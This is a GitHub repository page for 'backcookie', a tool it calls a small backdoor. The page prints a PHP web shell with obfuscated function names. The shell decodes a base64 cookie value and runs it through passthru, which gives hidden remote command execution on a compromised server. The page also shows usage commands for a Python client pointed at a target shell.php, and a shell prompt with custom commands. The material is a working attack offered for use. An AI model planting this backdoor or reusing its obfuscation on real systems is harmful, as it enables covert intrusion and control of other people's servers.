Skip to content

jofpin/backcookie

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

51 Commits
 
 
 
 
 
 

Repository files navigation

backcookie

Small backdoor using cookie.

==========

<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Custom command (binfo), You get objective information

@pwned:~$ binfo

Custom command (exit), to exit.

@pwned:~$ exit

Happy hacking!


Copyright, 2013 - 2016 by Jose Pino


Releases

No releases published

Packages

No packages published

Languages